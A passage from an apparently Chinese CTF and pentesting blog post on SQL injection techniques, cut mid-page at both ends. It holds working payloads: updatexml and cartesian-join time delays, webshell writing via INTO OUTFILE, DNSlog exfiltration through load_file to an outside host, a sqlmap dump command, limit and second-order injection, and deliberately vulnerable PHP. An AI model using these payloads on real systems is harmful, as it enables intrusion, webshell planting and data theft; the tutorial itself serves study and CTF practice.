class=\"wp-block-heading\">\u7b1b\u5361\u5c14\u79ef<\/h3>\n\n\n\n<p>\u7b1b\u5361\u5c14\u79ef(\u56e0\u4e3a\u8fde\u63a5\u8868\u662f\u4e00\u4e2a\u5f88\u8017\u65f6\u7684\u64cd\u4f5c)\uff0c\u53ef\u4ee5\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select count(*) from information_schema.columns A, information_schema.columns B;<\/code><\/pre>\n\n\n\n<p>\u4ee3\u66ffsleep\uff0c\u6539\u6539\u811a\u672c\u5c31\u80fd\u6253ctfshow web219(\u8dd1\u592a\u5feb\u4e86\u503c\u597d\u50cf\u5c31\u4e0d\u5bf9\u4e86\uff0c\u6240\u4ee5\u6211\u52a0\u4e86\u4e2asleep(0.5))\uff0c\u4f46\u8bef\u5dee\u8fd8\u662f\u5f88\u5927\uff0c\u8fd9\u79cd\u65b9\u6cd5\u4e0d\u5efa\u8bae<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">GET_LOCK() \u52a0\u9501<\/h3>\n\n\n\n<p>\u53ef\u4ee5\u770b\u770b<a href=\"https:\/\/xz.aliyun.com\/t\/5505\">SQL\u6ce8\u5165\u6709\u8da3\u59ff\u52bf\u603b\u7ed3<\/a>\uff0c\u9650\u5236\u6709\u70b9\u591a\uff0c\u5f97\u540c\u65f6\u5f00\u4e24\u4e2a<code>SESSION<\/code>\u8fdb\u884c\u6ce8\u5165<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">updatexml<\/h3>\n\n\n\n<p>RCTF2021\u91cc\u6709\u4e00\u9053\u65f6\u95f4\u76f2\u6ce8\u9898\uff0c\u4e00\u9053\u8003\u5bdf\u6bd4\u8d5b\u9009\u624b\u4eec\u5982\u4f55\u5728\u9884\u7f16\u8bd1\u4e2d\u627e\u5230\u8017\u65f6\u51fd\u6570\u7684\u6311\u6218\uff0c\u56e0\u4e3aMySQL\u4e2d\u4f1a\u5bf9\u9700\u8981\u6267\u884c\u7684SQL\u8bed\u53e5\u8fdb\u884c\u9884\u5904\u7406\u6765\u4f18\u5316\u4e00\u4e9b\u65e0\u7528\u7684\u8bed\u53e5\u6216\u8005\u786e\u5b9a\u7c7b\u578b\u3002\u5f53\u5e74\u90a3\u9053\u9898\u53ea\u6709\u4e24\u89e3\uff0c\u5206\u522b\u662fNul1\u548c\u6e05\u534eRedbud\uff0c\u4ed6\u4eec\u6700\u7ec8\u90fd\u4f7f\u7528\u4e86updatexml\u4f5c\u4e3a\u4ea7\u751f\u5ef6\u65f6\u7684\u51fd\u6570\uff0c\u6211\u4eec\u6765\u6b23\u8d4f\u4e00\u4e0b\u4ed6\u4eec\u7684payload\uff1a<\/p>\n\n\n\n<p><strong>From Nu1l<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT\n    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG \nWHERE\n    '\ud83c\udf6c\u5173\u6ce8\u5609\u7136\ud83c\udf6c' = 
'\ud83c\udf6c\u987f\u987f\u89e3\u998b\ud83c\udf6c' OR '\ud83c\udf6cWatch Diana a day\ud83c\udf6c' = '\ud83c\udf6cKeep hunger away\ud83c\udf6c' OR '\ud83c\udf6c\u5609\u7136\u306b\u6ce8\u76ee\u3057\u3066\ud83c\udf6c' = '\ud83c\udf6c\u98df\u6b32\u3092\u305d\u305d\u308b\ud83c\udf6c' \nORDER BY\n(\n    updatexml (1,\n        IF(\n            ASCII(SUBSTR((SELECT USER()), 1, 1 )) = 65,\n            CONCAT(REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('b', 10000000)),\n            1\n        ),\n        1\n    ) \n)\n<\/code><\/pre>\n\n\n\n<p>\u5f53\u65f6\u6bd4\u8d5b\u7684\u65f6\u5019\u51fa\u9898\u4eba\u4f7f\u7528\u4e86<code>msleep<\/code>\u5ef6\u957f\u4e86\u6bcf\u6b21\u8bf7\u6c42\u7684\u65f6\u95f4\uff0c\u9700\u8981\u9009\u624b\u627e\u5230\u8017\u65f6\u66f4\u957f\uff08\u80fd\u591f\u7a33\u5b9a\u5ef6\u8fdf1.5\u79d2\u4ee5\u4e0a\uff09\u7684\u653b\u51fbpayload\u4e86\uff0c\u6765\u83b7\u53d6flag\uff0cNu1l\u8fd9\u4e2a\u89e3\u6cd5\u5b9e\u9645\u4e0a\u53ea\u80fd\u9020\u62100.5s-0.7s\u7684\u5ef6\u8fdf\uff0c\u4f46\u4ed6\u4eec\u7528\u4e86\u4e00\u4e2a\u522b\u51fa\u5fc3\u88c1\u7684\u505a\u6cd5\u589e\u5927\u4e86\u5ef6\u65f6\u2014\u2014\u540c\u65f6\u53d1\u5927\u91cf\u8bf7\u6c42\u7684\u5bfc\u81f4\u5927\u4e8e1\u79d2\u7684\u5ef6\u8fdf\u3002<\/p>\n\n\n\n<p><strong>From Redbud<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT\n    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG \nWHERE\n    '\ud83c\udf6c\u5173\u6ce8\u5609\u7136\ud83c\udf6c' = '\ud83c\udf6c\u987f\u987f\u89e3\u998b\ud83c\udf6c' OR '\ud83c\udf6cWatch Diana a day\ud83c\udf6c' = '\ud83c\udf6cKeep hunger away\ud83c\udf6c' OR '\ud83c\udf6c\u5609\u7136\u306b\u6ce8\u76ee\u3057\u3066\ud83c\udf6c' = '\ud83c\udf6c\u98df\u6b32\u3092\u305d\u305d\u308b\ud83c\udf6c' \nORDER BY\n(\n    updatexml (1,\n        concat(\n            '~',\n            (\n                if(\n                    (substr(hex(user()), 1, 1)='A'),\n                    (select 
length(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex('1')))))))))))))))))))))))))))))))),\n                    'a'\n                )\n            ),\n            1\n        ),\n        1\n    )<\/code><\/pre>\n\n\n\n<p>\u5177\u4f53\u7684\u5206\u6790\u53ef\u4ee5\u770b\u770b\u5f53\u5e74\u7684\u5b98\u65b9WP\uff1a<a href=\"https:\/\/blog.rois.io\/2021\/rctf-2021-official-writeup-2\/#EasySQLi\">RCTF 2021 Official Writeup<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">sql\u6ce8\u5165getshell<\/h1>\n\n\n\n<p><strong>\u524d\u63d0\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e<\/li>\n\n\n\n<li>web\u76ee\u5f55\u5177\u6709\u5199\u5165\u6743\u9650<\/li>\n\n\n\n<li>\u627e\u5230\u7f51\u7ad9\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n\n\n\n<li>secure_file_priv\u6ca1\u6709\u5177\u4f53\u503c\uff08secure_file_priv\u662f\u7528\u6765\u9650\u5236load dumpfile\u3001into outfile\u3001load_file()\u51fd\u6570\u5728\u54ea\u4e2a\u76ee\u5f55\u4e0b\u62e5\u6709\u4e0a\u4f20\u548c\u8bfb\u53d6\u6587\u4ef6\u7684\u6743\u9650\u3002\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">union select\u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=@ union select 1,2,3,4,'&lt;?php phpinfo() ?&gt;' into outfile 'C:\/wamp64\/www\/work\/WebShell.php'<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">lines terminated by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/Webshell.php' lines terminated by '&lt;?php phpinfo() ?&gt;';<br>\u539f\u7406\uff1a\u901a\u8fc7select\u8bed\u53e5\u67e5\u8be2\u7684\u5185\u5bb9\u5199\u5165\u6587\u4ef6\uff0c\u4e5f\u5c31\u662f&nbsp;1 into outfile 'C:\/wamp64\/www\/work\/webshell.php'&nbsp;\u8fd9\u6837\u5199\u7684\u539f\u56e0\uff0c\u7136\u540e\u5229\u7528&nbsp;lines terminated 
by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002lines terminated by&nbsp;\u53ef\u4ee5\u7406\u89e3\u4e3a&nbsp;\u4ee5\u6bcf\u884c\u7ec8\u6b62\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">lines starting by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/webshell.php' lines starting by '&lt;?php phpinfo() ?&gt;';<br>#\u539f\u7406\uff1a\u5229\u7528&nbsp;lines starting by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002lines starting by&nbsp;\u53ef\u4ee5\u7406\u89e3\u4e3a&nbsp;\u4ee5\u6bcf\u884c\u5f00\u59cb\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">fields terminated by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/webshell.php' fields terminated by '&lt;?php phpinfo() ?&gt;';\n#\u5229\u7528&nbsp;fields terminated by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002fields terminated by\u53ef\u4ee5\u7406\u89e3\u4e3a\u4ee5\u6bcf\u4e2a\u5b57\u6bb5\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">2.\u975e\u5e38\u89c4\u6ce8\u5165<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e2d\u8f6c\u6ce8\u5165<\/h1>\n\n\n\n<p>\u672c\u8d28\u4e0a\u6bd4\u8f83\u4f4e\u80fd\uff0c\u662f\u4e2a\u5077\u61d2\u6280\u5de7\u3002\u5982\u679c\u67d0\u4e2a\u7f51\u7ad9\u7684URL\u6ce8\u5165\u70b9\u662f\u7ecf\u8fc7\u7f16\u7801\u7684\uff0c\u4e0d\u80fd\u76f4\u63a5\u7ed3\u5408sqlmap\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\uff0c\u53ef\u4ee5\u672c\u5730\u642d\u5efa\u4e00\u4e2a\u7f51\u7ad9\uff0c\u5199\u4e00\u4e2aphp\u811a\u672c\u7f16\u7801\u6587\u4ef6\uff0c\u7136\u540e\u5c31\u53ef\u4ee5sqlmap\u4e00\u628a\u68ad\u4e86\u3002<\/p>\n\n\n\n<p>\u6bd4\u5982\u67d0\u4e2a\u7f51\u7ad9\u7684url\u4e3a<\/p>\n\n\n\n<pre 
class=\"wp-block-code\"><code>url\/show.php?id=MQo=<\/code><\/pre>\n\n\n\n<p>\u4f60\u53ef\u4ee5\u5728\u672c\u5730\u642d\u4e2a\u7f51\u7ad9\uff0c\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \n$id = base64_encode($_GET&#91;'id']);\necho file_get_contents(\"url\/show.php?id=$id\");\n\n\n\/\/base64_encode base67\u7f16\u7801\n\/\/file_get_contents \u7f51\u7edc\u8bf7\u6c42\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u7684\u8bdd\u8bbf\u95ee\u672c\u5730\u7f51\u7ad9http:\/\/127.0.0.1\/?id=1\u5c31\u7b49\u4e8e\u8bbf\u95eeurl\/show.php?id=MQo=\uff0c\u8fd9\u6837\u5bf9\u7740\u672c\u5730\u7f51\u7ad9\u5c31\u80fdsqlmap\u4e00\u628a\u68ad\u4e86\uff0c\u5f53\u7136\u4f60\u4e5f\u53ef\u4ee5\u76f4\u63a5\u81ea\u5df1\u5199\u4e2atamper\u811a\u672c\u8fdb\u884c\u653b\u51fb<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Dnslog\u5916\u5e26\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5bf9\u7f51\u7ad9\u7528sqlmap\u8dd1\u76f2\u6ce8\u7684\u8bdd\u6709\u53ef\u80fd\u4f1a\u628aip\u5c01\u6389\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u8003\u8651\u628a\u6570\u636e\u5916\u5e26\u5230dnslog\u4e0a\u901a\u8fc7\u65e5\u5fd7\u8bfb\u56de\u663e\uff0c\u8fd9\u6837\u4e5f\u7b97\u53d8\u76f8\u4ee3\u7406\u6c60\u4e86\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u65b9\u6cd5\u9700\u8981\u4f7f\u7528Load_file\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u7684\u4f5c\u7528\u662f\u8bfb\u53d6\u6587\u4ef6\u5e76\u8fd4\u56de\u6587\u4ef6\u5185\u5bb9\u4e3a\u5b57\u7b26\u4e32\uff0c\u8bbf\u95ee\u4e92\u8054\u7f51\u4e2d\u7684\u6587\u4ef6\u65f6\uff0c\u9700\u8981\u5728\u6700\u524d\u9762\u52a0\u4e0a\u4e24\u4e2a\u659c\u6760 \/\/\uff0c\u6709\u51e0\u4e2a\u5229\u7528\u7684\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li>\u9996\u5148\u8981\u6709\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u9700\u8981\u6709root\u6743\u9650<\/li>\n\n\n\n<li>\u6570\u636e\u5e93\u6709\u8bfb\u5199\u6743\u9650\u5373\uff1asecure_file_priv=\u201c\u201d<\/li>\n\n\n\n<li>\u5f97\u6709\u8bf7\u6c42url\u6743\u9650<\/li>\n\n\n\n<li>\u8fd8\u5fc5\u987b\u5f97\u662fwindows\u670d\u52a1\u5668<\/li>\n<\/ul>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select load_file(concat('\/\/',(select database()),'.je5i3a.dnslog.cn\/1.txt'));<\/code><\/pre>\n\n\n\n<p><code>concat<\/code>\u51fd\u6570\uff0c\u5c06\u6267\u884c\u7684sql\u8bed\u53e5,\u4e0eDNS\u8bf7\u6c42\u7684url\u8fdb\u884c\u62fc\u63a5\uff0c\u6700\u540e\u5077\u4e2a\u522b\u4eba\u7684\u56fe\u770b\u770b\u7ed3\u679c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-26-1024x274.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"274\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-26-1024x274.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1495\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h1 
class=\"wp-block-heading\">\u4f2a\u9759\u6001\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8fd9\u79cd\u6ce8\u5165\u5728\u73b0\u5b9e\u4e2d\u7ecf\u5e38\u51fa\u73b0\uff0c\u6211\u6709\u4e00\u6b21\u5728\u68a6\u91cc\u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5\u7684\u65f6\u5019\u5c31\u9047\u5230\u4e86\u4e00\u4e2aurl\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>xxx\/info\/123324423235435<\/code><\/pre>\n\n\n\n<p>\u800cinfo\u540e\u9762\u8fd9\u4e2a\u6570\u5b57\u5176\u5b9e\u662f\u53ef\u4ee5sql\u6ce8\u5165\uff0c\u5229\u7528sqlmap\u4e5f\u80fd\u8dd1\u51fa\u6765\uff0c\u539f\u56e0\u662f\u90a3\u91cc\u7684\u6e90\u7801\u5176\u5b9e\u662f\u4e00\u4e2a\u63a5\u53e3\uff0c\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Route::get('\/info\/{id}')<\/code><\/pre>\n\n\n\n<p>\u8def\u7531\u622a\u53d6id\u503c\u540e\u4f1a\u76f4\u63a5\u628a\u503c\u4f20\u5230\u63a7\u5236\u5668\u51fd\u6570\uff0c\u56e0\u6b64\u5bfc\u81f4sql\u6ce8\u5165\u7684\u4ea7\u751f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ip_data=DB::select(\"select * from cloud_ip where id=$id\");<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u6211\u4eec\u5e73\u65f6\u6d4b\u8bd5sql\u7684\u65f6\u5019\u4e0d\u8981\u53ea\u5173\u6ce8?id=1\u8fd9\u79cdurl\uff0c\u4e5f\u8981\u5173\u6ce8\/info\/1332\u8fd9\u6837\u7684\u8def\u5f84\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">HTTP\u8bf7\u6c42\u5934\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8fd9\u79cd\u6f0f\u6d1e\u4ea7\u751f\u539f\u56e0\u5176\u5b9e\u90fd\u86ee\u76f8\u4f3c\uff0c\u548c\u6b63\u5e38\u7684sql\u6ce8\u5165\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u5c31\u662fsql\u8bed\u53e5\u7684\u67e5\u8be2\u4e5f\u7528\u4e86http\u8bf7\u6c42\u5934\u7684\u53c2\u6570\uff0c\u6bd4\u5982User-Agent\u3001cookie\u3001X-Forwarded-For\u3001Referer\u7b49\u7b49\uff0c\u53ea\u8981\u6d4b\u8bd5\u7684\u65f6\u5019\u6ce8\u610f\u4e00\u4e0b\u4e5f\u6d4b\u8bd5\u8fd9\u51e0\u4e2a\u70b9\u5373\u53ef\uff0c\u6216\u8005sqlmap\u4e00\u628a\u68ad\u7684\u65f6\u5019\u52a0\u4e0aLevel 
5\uff0c\u76f4\u63a5\u5c31\u5e2e\u6211\u4eec\u628a\u8fd9\u4e9b\u70b9\u90fd\u6d4b\u8bd5\u5b8c\u4e86\u3002<\/p>\n\n\n\n<p>\u4e3e\u4e2a\u4f8b\u5b50\uff0c\u67d0\u5ddd\u6e1d\u5927\u5b66\u751f\u4fe1\u5b89\u7ade\u8d5b\u53ea\u6709\u4e00\u4e24\u89e3\u7684sql\u9898\uff0c\u5b83\u6f0f\u6d1e\u4ea7\u751f\u7684\u539f\u56e0\u53ef\u80fd\u662f\u56e0\u4e3a\u540e\u53f0\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sq1=\"SELECT * FROM users WHERE username=$session_id LIMIT 0,1\";<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u6f0f\u6d1e\u7684\u4ea7\u751f\u70b9\u5c31\u5f88\u660e\u663e\u4e86\uff0c\u628a\u4e4b\u524d\u7528\u4e8eunion\u6ce8\u5165\u7684payload\u7528\u5728session_id\u4e0a\u5373\u53ef\uff0c\u6211\u4eec\u7528&#8211;data=&#8221;session_id=t6kvde8irh72fjte5sjdddjna0&#8243;\u7ed9sqlmap\u6307\u660e\u6ce8\u5165\u70b9\uff0c\u7136\u540e\u4e00\u628a\u68ad\u5373\u53ef\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/f47b450586d37024.node.nsctf.cn\/index.php\" --data \"session_id=t6kvde8irh72fjte5sjdddjna0\" -D level1 -T secrets -C secret --dump secret<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">limit\u6ce8\u5165<\/h1>\n\n\n\n<p>\u6709\u65f6\u5019\u9047\u5230\u7684sql\u8bed\u53e5\u6bd4\u8f83\u82db\u523b\uff0c\u53ef\u63a7\u70b9\u53ea\u6709limit\u540e\u9762\uff1aselect * from limit test limit 1,[\u53ef\u63a7\u70b9] or select \u2026 limit [\u53ef\u63a7\u70b9]\uff0climit\u540e\u9762\u80fd\u591f\u62fc\u63a5\u7684\u51fd\u6570\u53ea\u6709into\u548cprocedure\uff0cinto\u53ef\u4ee5\u7528\u6765\u5199\u6587\u4ef6\uff0c\u8fd9\u91cc\u6211\u4eec\u5148\u4e0d\u8003\u8651\uff0c\u56e0\u4e3a\u5199\u6587\u4ef6\u7684\u6761\u4ef6\u6bd4\u8f83\u82db\u523b\u3002<\/p>\n\n\n\n<p>\u5728Limit\u540e\u9762\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u7528 procedure analyse()\u8fd9\u4e2a\u5b50\u67e5\u8be2\uff0c\u800c\u4e14\u53ea\u80fd\u7528extractvalue \u548c benchmark 
\u51fd\u6570\u8fdb\u884c\u5ef6\u65f6\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u8bed\u6cd5\u662f\u6709\u524d\u63d0\u6761\u4ef6\u7684\uff0c\u5c31\u662f<strong>5.0.0&lt; MySQL &lt;5.6.6\u7248\u672c<\/strong>\uff0c\u6240\u4ee5\u8fd9\u662f\u4e00\u79cd\u4f4e\u7248\u672c\u6709\u6548\u7684\u6ce8\u5165\u65b9\u6cd5\u3002<\/p>\n\n\n\n<p>\u5728\u5f00\u542f\u4e86\u62a5\u9519\u7684\u65f6\u5019\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u62a5\u9519\u6ce8\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id from test where id &gt;0 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-28-1024x696.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"696\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-28-1024x696.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1510\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u6ca1\u6709\u5f00\u542f\u62a5\u9519\u5c31\u53ea\u80fd\u65f6\u95f4\u76f2\u6ce8\u4e86\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id from test where id &gt;0 order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, 
BENCHMARK(5000000,SHA1(1)),1))))),1)<\/code><\/pre>\n\n\n\n<p>BENCHMARK(5000000,SHA1(1))\u7b49\u6548\u4e3asleep()\uff0c\u4e4b\u524d\u5df2\u7ecf\u8bb2\u8fc7\u4e86\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e8c\u6b21\u6ce8\u5165<\/h1>\n\n\n\n<p>\u9020\u6210\u4e8c\u6b21\u6ce8\u5165\u7684\u672c\u8d28\uff0c\u8fd8\u662f\u56e0\u4e3a\u5bf9\u8f93\u5165\u6ca1\u6709\u505a\u8db3\u591f\u7684\u9650\u5236\uff0c\u5bfc\u81f4\u867d\u7136\u5bf9\u653b\u51fb\u8005\u6709\u4e00\u5b9a\u7684\u963b\u788d\uff0c\u4f46\u7ed5\u4e00\u4e2a\u5708\u8fc7\u53bb\u8fd8\u662f\u80fd\u8fbe\u5230\u76ee\u7684\uff0c\u4ee5Sqli-Labs Less24\u4e3a\u4f8b\uff0c\u5b83\u540e\u7aef\u4fee\u6539\u5bc6\u7801\u7684\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sql = \"UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'\"<\/code><\/pre>\n\n\n\n<p>\u5047\u5982\u6211\u4eec\u6ce8\u518c\u4e86\u4e00\u4e2a\u8d26\u53f7\uff0c\u8d26\u53f7\u540d\u4e3aadmin\u2019#\uff0c\u6211\u4eec\u60f3\u628a\u5b83\u7684\u5bc6\u7801\u4fee\u6539\u4e3a1234567\uff0c\u5219\u540e\u7aef\u6267\u884c\u7684sql\u8bed\u53e5\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE users SET PASSWORD='1234567' where username='admin\u2019#' and password='$curr_pass'<\/code><\/pre>\n\n\n\n<p>\u7b49\u4ef7\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE users SET PASSWORD='1234567' where username='admin\u2019<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u76f4\u63a5\u628aadmin\u7684\u5bc6\u7801\u4fee\u6539\u4e3a1234567\u4e86\u3002<\/p>\n\n\n\n<p>\u7ea2\u5ca9\u676f\u6709\u4e2asql\u9898\u66b4\u8e81\u8001\u54e5\u7684\u4f5c\u4e1a\u7cfb\u7edf\u4e5f\u662f\u5982\u6b64\uff0c\u5f53\u7136\u90a3\u4e2a\u9898\u8fd8\u8981\u9ad8\u7ea7\u4e00\u70b9\uff0c\u5b83\u4e0d\u4f46\u662f\u4e8c\u6b21\u6ce8\u5165\uff0c\u8fd8\u662f\u6587\u4ef6\u540d\u6ce8\u5165\uff0c\u901a\u8fc7\u4e0a\u4f20\u4e00\u4e2a\u540d\u53eb&#8217; and 1=2 union select xxx from xxx where 
&#8216;.doc&#8217;=&#8217;.doc\u7684\u6587\u4ef6\uff0c\u7136\u540e\u8bbf\u95ee\u8be5\u6587\u4ef6\uff0c\u6700\u540e\u7684sql\u8bed\u53e5\u5c31\u4f1a\u4ea7\u751f\u95ed\u5408\uff0c\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select '1' and 1=2 union select xxx from xxx where '.doc' = '.doc'<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">\u7f16\u7801\u6ce8\u5165<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u5bbd\u5b57\u8282\u6ce8\u5165<\/h2>\n\n\n\n<p>\u4f8b\u5b50\u6458\u6284\u81ea\uff1a<a href=\"https:\/\/xz.aliyun.com\/t\/7169#toc-15\">\u5bf9MYSQL\u6ce8\u5165\u76f8\u5173\u5185\u5bb9\u53ca\u90e8\u5206Trick\u7684\u5f52\u7c7b\u5c0f\u7ed3<\/a><\/p>\n\n\n\n<p>\u5047\u5982\u8fd9\u91cc\u6709\u4e00\u4e2a\u7f51\u7ad9\uff0c\u540e\u53f0\u6e90\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . mysqli_connect_error());\n}\n$conn-&gt;query(\"set names 'gbk';\");\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username' and password='$password';\";\n$rs = mysqli_query($conn,$sql);\necho $sql.'&lt;br&gt;';\nif($rs-&gt;fetch_row()){\n    echo \"success\";\n}else{\n    echo \"fail\";\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u7684\u5173\u952e\u4ee3\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$conn-&gt;query(\"set names 'gbk';\");\n$username = addslashes(@$_POST&#91;'username']);\n$password = 
